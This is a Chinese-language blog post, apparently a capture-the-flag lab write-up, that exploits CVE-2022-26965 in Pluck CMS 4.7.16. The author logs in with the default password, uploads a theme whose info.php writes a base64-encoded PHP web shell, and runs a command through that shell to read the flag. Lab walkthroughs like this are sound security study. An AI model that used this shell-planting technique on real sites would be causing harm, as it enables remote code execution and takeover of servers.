首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >CVE-2022-26965

CVE-2022-26965

作者头像
cultureSun
发布2023-05-18 14:58:38
发布2023-05-18 14:58:38
5480
举报
文章被收录于专栏:cultureSun学安全cultureSun学安全

简介

是一个CMS系统----Pluck-CMS-Pluck-4.7.16 的后台RCE漏洞。

本人使用春秋云境免费靶场在线搭建。

详解

  1. 打开首页,发现下面有两个按钮可以点,其中一个应该是后台登录按钮
  1. 点击admin,果然跳转到了登录页面,只有密码框,输入admin,登录成功,惊呆了老铁!!!
  1. 上图是管理界面,随便点点,发现一个上传图片和上传文件的入口,尝试了一下,无法获得shell
  1. 又发现一个可以上传主题入口,需要上传zip压缩文件。
  1. github找了个开源主题,阅读源码,发现安装主题会读取并执行主题中info.php。修改info.php代码。
代码语言:javascript
复制
<?php
file_put_contents('shell.php',base64_decode('PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOz8+'));
?>

PHP

file_put_contents() 是 PHP 中的一个函数,用于将一个字符串写入文件中。

  1. 上传成功后,切换主题并保存。
  1. 首页访问shell.php文件,cmd参数传入cat /falg获取falg。
代码语言:javascript
复制
http://eci-2ze55xp3m6rd9j75pecz.cloudeci1.ichunqiu.com/shell.php?cmd=cat%20/flag

Other

结语

我加入了腾讯云自媒体分享计划,可以获取到腾讯云周边、技术书籍、线下沙龙、云服务器优惠等等。 我的博客即将同步至腾讯云开发者社区,邀请大家一同入驻:https://cloud.tencent.com/developer/support-plan?invite_code=1f93zvim5fqci

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 简介
  • 详解
  • 结语
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档